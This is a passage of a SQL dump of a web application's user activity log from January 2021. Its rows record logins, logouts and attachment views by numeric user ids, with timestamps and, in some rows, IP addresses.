15:53:28','2021-01-06 15:53:28',NULL),(32469,128,'Logout',128,'2021-01-06 08:23:15','2021-01-06 08:23:15','175.9.121.129'),(32470,128,'Login',128,'2021-01-06 08:25:12','2021-01-06 08:25:12','175.9.121.129'),(32471,128,'Logout',128,'2021-01-06 08:25:33','2021-01-06 08:25:33','175.9.121.129'),(32472,151,'Login',151,'2021-01-06 08:25:41','2021-01-06 08:25:41','175.9.121.129'),(32473,1,'Attachment',1351,'2021-01-06 16:41:30','2021-01-06 16:41:30',NULL),(32474,1,'Attachment',1178,'2021-01-06 16:41:35','2021-01-06 16:41:35',NULL),(32475,1,'Attachment',1176,'2021-01-06 16:41:35','2021-01-06 16:41:35',NULL),(32476,1,'Attachment',1177,'2021-01-06 16:41:35','2021-01-06 16:41:35',NULL),(32477,115,'Attachment',1176,'2021-01-07 08:09:40','2021-01-07 08:09:40',NULL),(32478,115,'Attachment',1177,'2021-01-07 08:09:40','2021-01-07 08:09:40',NULL),(32479,115,'Attachment',1351,'2021-01-07 08:09:40','2021-01-07 08:09:40',NULL),(32480,115,'Attachment',1178,'2021-01-07 08:09:40','2021-01-07 08:09:40',NULL),(32481,149,'Attachment',1351,'2021-01-07 08:09:57','2021-01-07 08:09:57',NULL),(32482,2,'Attachment',1351,'2021-01-07 08:13:06','2021-01-07 08:13:06',NULL),(32483,2,'Attachment',1178,'2021-01-07 08:13:06','2021-01-07 08:13:06',NULL),(32484,2,'Attachment',1176,'2021-01-07 08:13:06','2021-01-07 08:13:06',NULL),(32485,2,'Attachment',1177,'2021-01-07 08:13:06','2021-01-07 08:13:06',NULL),(32486,46,'Attachment',1177,'2021-01-07 08:14:11','2021-01-07 08:14:11',NULL),(32487,46,'Attachment',1178,'2021-01-07 08:14:11','2021-01-07 08:14:11',NULL),(32488,46,'Attachment',1351,'2021-01-07 08:14:11','2021-01-07 08:14:11',NULL),(32489,46,'Attachment',1176,'2021-01-07 08:14:11','2021-01-07 08:14:11',NULL),(32490,46,'Login',46,'2021-01-07 08:50:40','2021-01-07 08:50:40',NULL),(32491,49,'Login',49,'2021-01-07 08:53:35','2021-01-07 08:53:35',NULL),(32492,66,'Login',66,'2021-01-07 08:58:34','2021-01-07 08:58:34',NULL),(32493,66,'Attachment',1351,'2021-01-07 08:58:45','2021-01-07 08:58:45',NULL),(32494,66,'Logout',66,'2021-01-07 02:24:03','2021-01-07 02:24:03','106.121.67.116'),(32495,115,'Login',115,'2021-01-07 02:24:24','2021-01-07 02:24:24','106.121.67.116'),(32496,122,'Login',122,'2021-01-07 15:13:56','2021-01-07 15:13:56',NULL),(32497,122,'Logout',122,'2021-01-07 07:20:37','2021-01-07 07:20:37','223.104.218.249'),(32498,152,'Login',152,'2021-01-07 07:23:33','2021-01-07 07:23:33','223.104.218.249'),(32499,2,'Attachment',1177,'2021-01-07 16:59:53','2021-01-07 16:59:53',NULL),(32500,2,'Attachment',1176,'2021-01-07 16:59:53','2021-01-07 16:59:53',NULL),(32501,2,'Attachment',1351,'2021-01-07 16:59:53','2021-01-07 16:59:53',NULL),(32502,2,'Attachment',1178,'2021-01-07 16:59:53','2021-01-07 16:59:53',NULL),(32503,2,'Attachment',1176,'2021-01-07 17:03:21','2021-01-07 17:03:21',NULL),(32504,2,'Attachment',1351,'2021-01-07 17:03:21','2021-01-07 17:03:21',NULL),(32505,2,'Attachment',1177,'2021-01-07 17:03:21','2021-01-07 17:03:21',NULL),(32506,2,'Attachment',1178,'2021-01-07 17:03:21','2021-01-07 17:03:21',NULL),(32507,2,'Attachment',1193,'2021-01-08 04:17:34','2021-01-08 04:17:34',NULL),(32508,121,'Attachment',1351,'2021-01-08 15:15:35','2021-01-08 15:15:35',NULL),(32509,152,'Attachment',1177,'2021-01-08 15:17:26','2021-01-08 15:17:26',NULL),(32510,152,'Attachment',1176,'2021-01-08 15:17:26','2021-01-08 15:17:26',NULL),(32511,152,'Attachment',1178,'2021-01-08 15:17:26','2021-01-08 15:17:26',NULL),(32512,152,'Attachment',1351,'2021-01-08 15:17:26','2021-01-08 15:17:26',NULL),(32513,152,'Attachment',1099,'2021-01-08 15:17:41','2021-01-08 15:17:41',NULL),(32514,46,'Attachment',1178,'2021-01-08 15:18:32','2021-01-08 15:18:32',NULL),(32515,46,'Attachment',1176,'2021-01-08 15:18:32','2021-01-08 15:18:32',NULL),(32516,46,'Attachment',1351,'2021-01-08 15:18:32','2021-01-08 15:18:32',NULL),(32517,46,'Attachment',1177,'2021-01-08 15:18:32','2021-01-08 15:18:32',NULL),(32518,115,'Attachment',1176,'2021-01-08 15:43:29','2021-01-08 15:43:29',NULL),(32519,115,'Attachment',1177,'2021-01-08 15:43:29','2021-01-08 15:43:29',NULL),(32520,115,'Attachment',1178,'2021-01-08 15:43:29','2021-01-08 15:43:29',NULL),(32521,115,'Attachment',1351,'2021-01-08 15:43:30','2021-01-08 15:43:30',NULL),(32522,152,'Logout',152,'2021-01-08 18:59:43','2021-01-08 18:59:43',NULL),(32523,121,'Login',121,'2021-01-08 19:00:13','2021-01-08 19:00:13',NULL),(32524,121,'Logout',121,'2021-01-08 19:01:02','2021-01-08 19:01:02',NULL),(32525,152,'Login',152,'2021-01-08 19:01:18','2021-01-08 19:01:18',NULL),(32526,152,'Logout',152,'2021-01-08 11:03:44','2021-01-08 11:03:44','223.104.218.84'),(32527,152,'Login',152,'2021-01-08 11:03:53','2021-01-08 11:03:53','223.104.218.84'),(32528,152,'Logout',152,'2021-01-08 11:06:13','2021-01-08 11:06:13','223.104.218.84'),(32529,121,'Login',121,'2021-01-08 11:07:13','2021-01-08 11:07:13','223.104.218.84'),(32530,49,'Login',49,'2021-01-08 11:39:26','2021-01-08 11:39:26','121.101.212.150'),(32531,121,'Login',121,'2021-01-08 19:54:33','2021-01-08 19:54:33',NULL),(32532,46,'Login',46,'2021-01-08 11:59:07','2021-01-08 11:59:07','123.116.47.119'),(32533,49,'Logout',49,'2021-01-08 20:11:33','2021-01-08 20:11:33',NULL),(32534,46,'Login',46,'2021-01-08 12:11:55','2021-01-08 12:11:55','123.116.47.119'),(32535,121,'Logout',121,'2021-01-11 10:41:54','2021-01-11 10:41:54',NULL),(32536,152,'Login',152,'2021-01-11 10:42:00','2021-01-11 10:42:00',NULL),(32537,152,'Logout',152,'2021-01-11 02:48:12','2021-01-11 02:48:12','223.104.218.75'),(32538,121,'Login',121,'2021-01-11 02:48:20','2021-01-11 02:48:20','223.104.218.75'),(32539,121,'Logout',121,'2021-01-11 02:52:17','2021-01-11 02:52:17','223.104.218.75'),(32540,152,'Login',152,'2021-01-11 02:52:24','2021-01-11 02:52:24','223.104.218.75'),(32541,152,'Logout',152,'2021-01-11 02:53:42','2021-01-11 02:53:42','223.104.218.75'),(32542,121,'Login',121,'2021-01-11 02:53:50','2021-01-11 02:53:50','223.104.218.75'),(32543,121,'Logout',121,'2021-01-11 02:54:39','2021-01-11 02:54:39','223.104.218.75'),(32544,137,'Login',137,'2021-01-11 02:55:56','2021-01-11 02:55:56','223.104.218.75'),(32545,137,'Logout',137,'2021-01-11 02:56:29','2021-01-11 02:56:29','223.104.218.75'),(32546,122,'Login',122,'2021-01-11 02:56:50','2021-01-11 02:56:50','223.104.218.75'),(32547,122,'Logout',122,'2021-01-11 02:57:36','2021-01-11 02:57:36','223.104.218.75'),(32548,152,'Login',152,'2021-01-11 02:57:40','2021-01-11 02:57:40','223.104.218.75'),(32549,152,'Logout',152,'2021-01-11 02:57:46','2021-01-11 02:57:46','223.104.218.75'),(32550,121,'Login',121,'2021-01-11 02:57:53','2021-01-11 02:57:53','223.104.218.75'),(32551,121,'Logout',121,'2021-01-11 02:58:11','2021-01-11 02:58:11','223.104.218.75'),(32552,122,'Login',122,'2021-01-11 02:58:27','2021-01-11 02:58:27','223.104.218.75'),(32553,122,'Logout',122,'2021-01-11 03:01:51','2021-01-11 03:01:51','223.104.218.75'),(32554,121,'Login',121,'2021-01-11 03:01:59','2021-01-11 03:01:59','223.104.218.75'),(32555,121,'Logout',121,'2021-01-11 03:16:04','2021-01-11 03:16:04','223.104.218.75'),(32556,122,'Login',122,'2021-01-11 03:16:29','2021-01-11 03:16:29','223.104.218.75'),(32557,122,'Logout',122,'2021-01-11 03:17:57','2021-01-11 03:17:57','223.104.218.75'),(32558,121,'Login',121,'2021-01-11 03:18:07','2021-01-11 03:18:07','223.104.218.75'),(32559,115,'Logout',115,'2021-01-11 06:42:17','2021-01-11 06:42:17','121.101.212.150'),(32560,49,'Login',49,'2021-01-11 06:42:43','2021-01-11 06:42:43','121.101.212.150'),(32561,46,'Attachment',757,'2021-01-11 14:53:55','2021-01-11 14:53:55',NULL),(32562,151,'Logout',151,'2021-01-11 09:54:37','2021-01-11 09:54:37','175.9.121.129'),(32563,128,'Login',128,'2021-01-11 09:54:42','2021-01-11 09:54:42','175.9.121.129'),(32564,134,'Logout',134,'2021-01-11 10:23:10','2021-01-11 10:23:10','175.9.121.129'),(32565,133,'Login',133,'2021-01-11 10:23:31','2021-01-11 10:23:31','175.9.121.129'),(32566,133,'Logout',133,'2021-01-11 18:24:00','2021-01-11 18:24:00',NULL),(32567,134,'Login',134,'2021-01-11 10:24:29','2021-01-11 10:24:29','175.9.121.129'),(32568,134,'Logout',134,'2021-01-11 10:24:44','2021-01-11 10:24:44','175.9.121.129'),(32569,133,'Login',133,'2021-01-11 10:25:02','2021-01-11 10:25:02','175.9.121.129'),(32570,128,'Logout',128,'2021-01-11 10:44:13','2021-01-11 10:44:13','175.9.121.129'),(32571,134,'Login',134,'2021-01-11 10:44:31','2021-01-11 10:44:31','175.9.121.129'),(32572,134,'Logout',134,'2021-01-11 10:44:58','2021-01-11 10:44:58','175.9.121.129'),(32573,128,'Login',128,'2021-01-11 10:45:04','2021-01-11 10:45:04','175.9.121.129'),(32574,121,'Logout',121,'2021-01-12 11:46:25','2021-01-12 11:46:25','223.104.218.8'),(32575,122,'Login',122,'2021-01-12 11:46:48','2021-01-12 11:46:48','223.104.218.8'),(32576,122,'Logout',122,'2021-01-12 11:48:00','2021-01-12 11:48:00','223.104.218.8'),(32577,121,'Login',121,'2021-01-12 11:48:08','2021-01-12 11:48:08','223.104.218.8'),(32578,121,'Logout',121,'2021-01-13 00:50:57','2021-01-13 00:50:57','223.104.218.8'),(32579,152,'Login',152,'2021-01-13 00:51:05','2021-01-13 00:51:05','223.104.218.8'),(32580,152,'Logout',152,'2021-01-13 00:51:32','2021-01-13 00:51:32','223.104.218.8'),(32581,121,'Login',121,'2021-01-13 00:51:37','2021-01-13 00:51:37','223.104.218.8'),(32582,121,'Logout',121,'2021-01-13 00:51:55','2021-01-13 00:51:55','223.104.218.8'),(32583,152,'Login',152,'2021-01-13 00:52:01','2021-01-13 00:52:01','223.104.218.8'),(32584,152,'Logout',152,'2021-01-13 00:53:12','2021-01-13 00:53:12','223.104.218.8'),(32585,121,'Login',121,'2021-01-13 00:53:17','2021-01-13 00:53:17','223.104.218.8'),(32586,121,'Login',121,'2021-01-13 00:56:26','2021-01-13 00:56:26','223.104.218.8'),(32587,149,'Logout',149,'2021-01-13 09:37:50','2021-01-13 09:37:50',NULL),(32588,149,'Login',149,'2021-01-13 09:38:05','2021-01-13 09:38:05',NULL),(32589,133,'Logout',133,'2021-01-13 01:44:17','2021-01-13 01:44:17','175.9.128.162'),(32590,49,'Login',49,'2021-01-13 01:44:30','2021-01-13 01:44:30','175.9.128.162'),(32591,2,'Attachment',1176,'2021-01-13 10:34:38','2021-01-13 10:34:38',NULL),(32592,2,'Attachment',1177,'2021-01-13 10:34:38','2021-01-13 10:34:38',NULL),(32593,2,'Attachment',1178,'2021-01-13 10:34:38','2021-01-13 10:34:38',NULL),(32594,2,'Attachment',1351,'2021-01-13 10:34:38','2021-01-13 10:34:38',NULL),(32595,2,'Attachment',1177,'2021-01-13 10:35:23','2021-01-13 10:35:23',NULL),(32596,2,'Attachment',1176,'2021-01-13 10:35:23','2021-01-13 10:35:23',NULL),(32597,2,'Attachment',1178,'2021-01-13 10:35:23','2021-01-13 10:35:23',NULL),(32598,153,'Attachment',1177,'2021-01-13 11:05:06','2021-01-13 11:05:06',NULL),(32599,153,'Attachment',1176,'2021-01-13 11:05:06','2021-01-13 11:05:06',NULL),(32600,153,'Attachment',1178,'2021-01-13 11:05:06','2021-01-13 11:05:06',NULL),(32601,48,'Logout',48,'2021-01-13 06:14:53','2021-01-13 06:14:53','175.9.128.162'),(32602,49,'Login',49,'2021-01-13 06:15:04','2021-01-13 06:15:04','175.9.128.162'),(32603,49,'Logout',49,'2021-01-13 07:38:07','2021-01-13 07:38:07','175.9.128.162'),(32604,134,'Login',134,'2021-01-13 07:38:25','2021-01-13 07:38:25','175.9.128.162'),(32605,2,'Attachment',1178,'2021-01-13 16:39:18','2021-01-13 16:39:18',NULL),(32606,2,'Attachment',1177,'2021-01-13 16:39:18','2021-01-13 16:39:18',NULL),(32607,2,'Attachment',1351,'2021-01-13 16:39:18','2021-01-13 16:39:18',NULL),(32608,2,'Attachment',1176,'2021-01-13 16:39:18','2021-01-13 16:39:18',NULL),(32609,48,'Login',48,'2021-01-13 08:43:41','2021-01-13 08:43:41','175.9.128.162'),(32610,48,'Attachment',1178,'2021-01-13 16:44:23','2021-01-13 16:44:23',NULL),(32611,48,'Attachment',1177,'2021-01-13 16:44:23','2021-01-13 16:44:23',NULL),(32612,48,'Attachment',1176,'2021-01-13 16:44:23','2021-01-13 16:44:23',NULL),(32613,48,'Attachment',1351,'2021-01-13 16:44:23','2021-01-13 16:44:23',NULL),(32614,48,'Logout',48,'2021-01-13 16:45:36','2021-01-13 16:45:36',NULL),(32615,48,'Login',48,'2021-01-13 19:11:31','2021-01-13 19:11:31',NULL),(32616,48,'Login',48,'2021-01-14 13:48:23','2021-01-14 13:48:23',NULL),(32617,2,'Attachment',1176,'2021-01-14 14:45:14','2021-01-14 14:45:14',NULL),(32618,2,'Attachment',1351,'2021-01-14 14:45:14','2021-01-14 14:45:14',NULL),(32619,2,'Attachment',1177,'2021-01-14 14:45:14','2021-01-14 14:45:14',NULL),(32620,2,'Attachment',1178,'2021-01-14 14:45:14','2021-01-14 14:45:14',NULL),(32621,48,'Attachment',1176,'2021-01-14 14:49:44','2021-01-14 14:49:44',NULL),(32622,48,'Attachment',1177,'2021-01-14 14:49:44','2021-01-14 14:49:44',NULL),(32623,48,'Attachment',1178,'2021-01-14 14:49:44','2021-01-14 14:49:44',NULL),(32624,48,'Attachment',1351,'2021-01-14 14:49:44','2021-01-14 14:49:44',NULL),(32625,121,'Logout',121,'2021-01-14 08:22:40','2021-01-14 08:22:40','171.216.207.195'),(32626,122,'Login',122,'2021-01-14 08:22:45','2021-01-14 08:22:45','171.216.207.195'),(32627,122,'Logout',122,'2021-01-14 08:22:58','2021-01-14 08:22:58','171.216.207.195'),(32628,122,'Login',122,'2021-01-14 08:23:04','2021-01-14 08:23:04','171.216.207.195'),(32629,122,'Logout',122,'2021-01-14 08:45:22','2021-01-14 08:45:22','171.216.207.195'),(32630,121,'Login',121,'2021-01-14 08:45:28','2021-01-14 08:45:28','171.216.207.195'),(32631,121,'Attachment',1178,'2021-01-14 18:52:53','2021-01-14 18:52:53',NULL),(32632,121,'Attachment',1177,'2021-01-14 18:52:53','2021-01-14 18:52:53',NULL),(32633,121,'Attachment',1176,'2021-01-14 18:52:53','2021-01-14 18:52:53',NULL),(32634,121,'Attachment',1351,'2021-01-14 18:52:53','2021-01-14 18:52:53',NULL),(32635,46,'Attachment',1176,'2021-01-15 09:22:04','2021-01-15 09:22:04',NULL),(32636,46,'Attachment',1177,'2021-01-15 09:22:04','2021-01-15 09:22:04',NULL),(32637,46,'Attachment',1178,'2021-01-15 09:22:04','2021-01-15 09:22:04',NULL),(32638,46,'Attachment',1351,'2021-01-15 09:22:04','2021-01-15 09:22:04',NULL),(32639,2,'Attachment',1177,'2021-01-15 10:15:18','2021-01-15 10:15:18',NULL),(32640,2,'Attachment',1178,'2021-01-15 10:15:18','2021-01-15 10:15:18',NULL),(32641,2,'Attachment',1176,'2021-01-15 10:15:18','2021-01-15 10:15:18',NULL),(32642,2,'Attachment',1351,'2021-01-15 10:15:18','2021-01-15 10:15:18',NULL),(32643,119,'Attachment',1351,'2021-01-18 11:57:40','2021-01-18 11:57:40',NULL),(32644,129,'Login',129,'2021-01-18 11:58:07','2021-01-18 11:58:07',NULL),(32645,119,'Attachment',29,'2021-01-18 12:11:47','2021-01-18 12:11:47',NULL),(32646,119,'Attachment',539,'2021-01-18 12:12:09','2021-01-18 12:12:09',NULL),(32647,129,'Attachment',1176,'2021-01-18 15:03:50','2021-01-18 15:03:50',NULL),(32648,129,'Attachment',1177,'2021-01-18 15:03:50','2021-01-18 15:03:50',NULL),(32649,129,'Attachment',1178,'2021-01-18 15:03:50','2021-01-18 15:03:50',NULL),(32650,129,'Attachment',1351,'2021-01-18 15:03:50','2021-01-18 15:03:50',NULL),(32651,129,'Attachment',29,'2021-01-18 15:03:53','2021-01-18 15:03:53',NULL),(32652,2,'Attachment',1176,'2021-01-18 15:28:17','2021-01-18 15:28:17',NULL),(32653,2,'Attachment',1177,'2021-01-18 15:28:17','2021-01-18 15:28:17',NULL),(32654,2,'Attachment',1178,'2021-01-18 15:28:17','2021-01-18 15:28:17',NULL),(32655,2,'Attachment',1351,'2021-01-18 15:28:17','2021-01-18 15:28:17',NULL),(32656,2,'Attachment',29,'2021-01-18 15:32:12','2021-01-18 15:32:12',NULL),(32657,2,'Attachment',36,'2021-01-18 15:33:02','2021-01-18 15:33:02',NULL),(32658,2,'Attachment',24,'2021-01-18 15:33:39','2021-01-18 15:33:39',NULL),(32659,2,'Attachment',1099,'2021-01-18 15:39:56','2021-01-18 15:39:56',NULL),(32660,2,'Attachment',1177,'2021-01-18 16:11:38','2021-01-18 16:11:38',NULL),(32661,2,'Attachment',1176,'2021-01-18 16:11:38','2021-01-18 16:11:38',NULL),(32662,2,'Attachment',1178,'2021-01-18 16:11:39','2021-01-18 16:11:39',NULL),(32663,2,'Attachment',1351,'2021-01-18 16:11:39','2021-01-18 16:11:39',NULL),(32664,2,'Attachment',29,'2021-01-18 16:17:50','2021-01-18 16:17:50',NULL),(32665,2,'Attachment',36,'2021-01-18 16:18:41','2021-01-18 16:18:41',NULL),(32666,2,'Attachment',24,'2021-01-18 16:19:22','2021-01-18 16:19:22',NULL),(32667,2,'Attachment',1099,'2021-01-18 16:23:56','2021-01-18 16:23:56',NULL),(32668,2,'Attachment',539,'2021-01-18 16:30:32','2021-01-18 16:30:32',NULL),(32669,2,'Attachment',757,'2021-01-18 16:33:48','2021-01-18 16:33:48',NULL),(32670,2,'Attachment',1177,'2021-01-18 17:45:28','2021-01-18 17:45:28',NULL),(32671,2,'Attachment',1176,'2021-01-18 17:45:28','2021-01-18 17:45:28',NULL),(32672,2,'Attachment',1178,'2021-01-18 17:45:28','2021-01-18 17:45:28',NULL),(32673,2,'Attachment',1351,'2021-01-18 17:45:28','2021-01-18 17:45:28',NULL),(32674,2,'Attachment',1351,'2021-01-18 18:35:34','2021-01-18 18:35:34',NULL),(32675,2,'Attachment',1178,'2021-01-18 18:35:34','2021-01-18 18:35:34',NULL),(32676,2,'Attachment',1177,'2021-01-18 18:35:34','2021-01-18 18:35:34',NULL),(32677,2,'Attachment',1176,'2021-01-18 18:35:34','2021-01-18 18:35:34',NULL),(32678,2,'Attachment',29,'2021-01-18 18:35:39','2021-01-18 18:35:39',NULL),(32679,2,'Attachment',1177,'2021-01-18 20:21:38','2021-01-18 20:21:38',NULL),(32680,2,'Attachment',1351,'2021-01-18 20:21:38','2021-01-18 20:21:38',NULL),(32681,2,'Attachment',1178,'2021-01-18 20:21:38','2021-01-18 20:21:38',NULL),(32682,2,'Attachment',1176,'2021-01-18 20:21:38','2021-01-18 20:21:38',NULL),(32683,2,'Attachment',1178,'2021-01-19 09:44:29','2021-01-19 09:44:29',NULL),(32684,2,'Attachment',1176,'2021-01-19 09:44:29','2021-01-19 09:44:29',NULL),(32685,2,'Attachment',1351,'2021-01-19 09:44:29','2021-01-19 09:44:29',NULL),(32686,2,'Attachment',1177,'2021-01-19 09:44:29','2021-01-19 09:44:29',NULL),(32687,1,'Login',1,'2021-01-19 02:07:23','2021-01-19 02:07:23','121.101.212.150'),(32688,119,'Attachment',1177,'2021-01-19 10:13:29','2021-01-19 10:13:29',NULL),(32689,119,'Attachment',1351,'2021-01-19 10:13:29','2021-01-19 10:13:29',NULL),(32690,119,'Attachment',1176,'2021-01-19 10:13:29','2021-01-19 10:13:29',NULL),(32691,119,'Attachment',1178,'2021-01-19 10:13:29','2021-01-19 10:13:29',NULL),(32692,1,'Login',1,'2021-01-19 10:23:06','2021-01-19 10:23:06',NULL),(32693,1,'Attachment',29,'2021-01-19 10:33:47','2021-01-19 10:33:47',NULL),(32694,129,'Login',129,'2021-01-19 10:50:42','2021-01-19 10:50:42',NULL),(32695,50,'Login',50,'2021-01-19 10:57:08','2021-01-19 10:57:08',NULL),(32696,50,'Attachment',1178,'2021-01-19 11:02:00','2021-01-19 11:02:00',NULL),(32697,50,'Attachment',1177,'2021-01-19 11:02:00','2021-01-19 11:02:00',NULL),(32698,50,'Attachment',1351,'2021-01-19 11:02:00','2021-01-19 11:02:00',NULL),(32699,50,'Attachment',1176,'2021-01-19 11:02:00','2021-01-19 11:02:00',NULL),(32700,50,'Attachment',29,'2021-01-19 11:02:24','2021-01-19 11:02:24',NULL),(32701,2,'Attachment',1176,'2021-01-20 21:05:04','2021-01-20 21:05:04',NULL),(32702,2,'Attachment',1177,'2021-01-20 21:05:04','2021-01-20 21:05:04',NULL),(32703,2,'Attachment',1351,'2021-01-20 21:05:04','2021-01-20 21:05:04',NULL),(32704,119,'Attachment',29,'2021-01-22 10:38:38','2021-01-22 10:38:38',NULL),(32705,119,'Attachment',24,'2021-01-22 10:43:20','2021-01-22 10:43:20',NULL),(32706,155,'Login',155,'2021-01-22 07:36:17','2021-01-22 07:36:17','111.202.115.93'),(32707,155,'Attachment',1177,'2021-01-22 16:52:05','2021-01-22 16:52:05',NULL),(32708,155,'Attachment',1176,'2021-01-22 16:52:05','2021-01-22 16:52:05',NULL),(32709,155,'Attachment',1351,'2021-01-22 16:52:05','2021-01-22 16:52:05',NULL),(32710,155,'Attachment',1178,'2021-01-22 16:52:05','2021-01-22 16:52:05',NULL),(32711,119,'Login',119,'2021-01-25 17:44:01','2021-01-25 17:44:01',NULL),(32712,121,'Logout',121,'2021-01-26 01:17:10','2021-01-26 01:17:10','223.104.218.15'),(32713,156,'Logout',156,'2021-01-26 09:21:23','2021-01-26 09:21:23',NULL),(32714,152,'Login',152,'2021-01-26 09:21:33','2021-01-26 09:21:33',NULL),(32715,152,'Logout',152,'2021-01-26 09:21:42','2021-01-26 09:21:42',NULL),(32716,121,'Login',121,'2021-01-26 09:23:27','2021-01-26 09:23:27',NULL),(32717,121,'Logout',121,'2021-01-26 01:24:53','2021-01-26 01:24:53','223.104.218.15'),(32718,2,'Logout',2,'2021-01-26 01:24:54','2021-01-26 01:24:54','223.104.218.15'),(32719,156,'Login',156,'2021-01-26 01:25:37','2021-01-26 01:25:37','223.104.218.15'),(32720,156,'Logout',156,'2021-01-26 01:52:25','2021-01-26 01:52:25','223.104.218.15'),(32721,156,'Login',156,'2021-01-26 09:52:47','2021-01-26 09:52:47',NULL),(32722,152,'Login',152,'2021-01-26 01:56:04','2021-01-26 01:56:04','101.206.169.108'),(32723,122,'Login',122,'2021-01-26 01:56:30','2021-01-26 01:56:30','223.104.218.15'),(32724,156,'Attachment',1176,'2021-01-26 10:21:16','2021-01-26 10:21:16',NULL),(32725,156,'Attachment',1177,'2021-01-26 10:21:16','2021-01-26 10:21:16',NULL),(32726,156,'Attachment',1351,'2021-01-26 10:21:16','2021-01-26 10:21:16',NULL),(32727,156,'Attachment',1178,'2021-01-26 10:21:16','2021-01-26 10:21:16',NULL),(32728,156,'Login',156,'2021-01-26 10:34:09','2021-01-26 10:34:09',NULL),(32729,156,'Logout',156,'2021-01-26 10:35:05','2021-01-26 10:35:05',NULL),(32730,122,'Login',122,'2021-01-26 10:38:20','2021-01-26 10:38:20',NULL),(32731,156,'Logout',156,'2021-01-26 09:29:55','2021-01-26 09:29:55','223.104.218.96'),(32732,120,'Login',120,'2021-01-26 17:30:21','2021-01-26 17:30:21',NULL),(32733,120,'Logout',120,'2021-01-26 17:32:10','2021-01-26 17:32:10',NULL),(32734,156,'Login',156,'2021-01-26 17:33:15','2021-01-26 17:33:15',NULL),(32735,156,'Logout',156,'2021-01-26 17:33:31','2021-01-26 17:33:31',NULL),(32736,156,'Login',156,'2021-01-26 17:33:47','2021-01-26 17:33:47',NULL),(32737,156,'Login',156,'2021-01-26 17:34:21','2021-01-26 17:34:21',NULL),(32738,156,'Logout',156,'2021-01-26 09:35:37','2021-01-26 09:35:37','223.104.218.96'),(32739,156,'Login',156,'2021-01-26 09:35:54','2021-01-26 09:35:54','223.104.218.96'),(32740,156,'Logout',156,'2021-01-26 10:07:11','2021-01-26 10:07:11','223.104.218.96'),(32741,120,'Login',120,'2021-01-26 10:07:54','2021-01-26 10:07:54','223.104.218.96'),(32742,120,'Logout',120,'2021-01-26 18:08:37','2021-01-26 18:08:37',NULL),(32743,156,'Login',156,'2021-01-26 18:08:44','2021-01-26 18:08:44',NULL),(32744,157,'Login',157,'2021-01-26 10:23:11','2021-01-26 10:23:11','118.115.22.127'),(32745,48,'Attachment',1176,'2021-01-26 18:29:08','2021-01-26 18:29:08',NULL),(32746,48,'Attachment',1177,'2021-01-26 18:29:08','2021-01-26 18:29:08',NULL),(32747,48,'Attachment',1178,'2021-01-26 18:29:08','2021-01-26 18:29:08',NULL),(32748,48,'Attachment',1351,'2021-01-26 18:29:08','2021-01-26 18:29:08',NULL),(32749,122,'Logout',122,'2021-01-26 11:01:34','2021-01-26 11:01:34','223.104.218.15'),(32750,137,'Login',137,'2021-01-26 11:02:15','2021-01-26 11:02:15','223.104.218.15'),(32751,137,'Logout',137,'2021-01-26 11:07:43','2021-01-26 11:07:43','223.104.218.15'),(32752,122,'Login',122,'2021-01-26 11:08:08','2021-01-26 11:08:08','223.104.218.15'),(32753,122,'Logout',122,'2021-01-26 19:09:38','2021-01-26 19:09:38',NULL),(32754,156,'Login',156,'2021-01-26 19:09:54','2021-01-26 19:09:54',NULL),(32755,122,'Login',122,'2021-01-26 11:16:50','2021-01-26 11:16:50','223.104.218.15'),(32756,122,'Login',122,'2021-01-26 11:16:52','2021-01-26 11:16:52','223.104.218.15'),(32757,122,'Login',122,'2021-01-26 11:16:54','2021-01-26 11:16:54','223.104.218.15'),(32758,122,'Login',122,'2021-01-26 11:16:55','2021-01-26 11:16:55','223.104.218.15'),(32759,122,'Login',122,'2021-01-26 11:16:57','2021-01-26 11:16:57','223.104.218.15'),(32760,122,'Login',122,'2021-01-26 11:16:59','2021-01-26 11:16:59','223.104.218.15'),(32761,122,'Login',122,'2021-01-26 11:16:59','2021-01-26 11:16:59','223.104.218.15'),(32762,122,'Login',122,'2021-01-26 11:16:59','2021-01-26 11:16:59','223.104.218.15'),(32763,122,'Login',122,'2021-01-26 11:16:59','2021-01-26 11:16:59','223.104.218.15'),(32764,122,'Login',122,'2021-01-26 11:17:21','2021-01-26 11:17:21','223.104.218.15'),(32765,122,'Login',122,'2021-01-26 11:17:24','2021-01-26 11:17:24','223.104.218.15'),(32766,122,'Login',122,'2021-01-26 11:17:24','2021-01-26 11:17:24','223.104.218.15'),(32767,122,'Login',122,'2021-01-26 11:17:24','2021-01-26 11:17:24','223.104.218.15'),(32768,122,'Login',122,'2021-01-26 11:17:25','2021-01-26 11:17:25','223.104.218.15'),(32769,122,'Login',122,'2021-01-26 11:17:25','2021-01-26 11:17:25','223.104.218.15'),(32770,122,'Login',122,'2021-01-26 11:17:26','2021-01-26 11:17:26','223.104.218.15'),(32771,122,'Login',122,'2021-01-26 11:17:26','2021-01-26 11:17:26','223.104.218.15'),(32772,122,'Login',122,'2021-01-26 11:17:27','2021-01-26 11:17:27','223.104.218.15'),(32773,137,'Login',137,'2021-01-26 19:24:43','2021-01-26 19:24:43',NULL),(32774,55,'Attachment',1176,'2021-01-26 22:04:47','2021-01-26 22:04:47',NULL),(32775,55,'Attachment',1177,'2021-01-26 22:04:47','2021-01-26 22:04:47',NULL),(32776,55,'Attachment',1178,'2021-01-26 22:04:47','2021-01-26 22:04:47',NULL),(32777,55,'Attachment',1351,'2021-01-26 22:04:47','2021-01-26 22:04:47',NULL),(32778,49,'Login',49,'2021-01-27 00:40:00','2021-01-27 00:40:00','121.69.13.9'),(32779,1,'Logout',1,'2021-01-27 00:59:31','2021-01-27 00:59:31','121.69.13.9'),(32780,49,'Login',49,'2021-01-27 00:59:42','2021-01-27 00:59:42','121.69.13.9'),(32781,1,'Login',1,'2021-01-27 01:00:57','2021-01-27 01:00:57','121.69.13.9'),(32782,156,'Logout',156,'2021-01-27 01:07:31','2021-01-27 01:07:31','223.104.218.96'),(32783,120,'Login',120,'2021-01-27 01:08:00','2021-01-27 01:08:00','223.104.218.96'),(32784,120,'Logout',120,'2021-01-27 01:08:14','2021-01-27 01:08:14','223.104.218.96'),(32785,156,'Login',156,'2021-01-27 01:08:25','2021-01-27 01:08:25','223.104.218.96'),(32786,122,'Login',122,'2021-01-27 01:13:15','2021-01-27 01:13:15','223.104.218.15'),(32787,73,'Login',73,'2021-01-27 01:35:43','2021-01-27 01:35:43','121.69.13.9'),(32788,156,'Logout',156,'2021-01-27 10:05:30','2021-01-27 10:05:30',NULL),(32789,120,'Login',120,'2021-01-27 10:05:56','2021-01-27 10:05:56',NULL),(32790,137,'Logout',137,'2021-01-27 10:07:35','2021-01-27 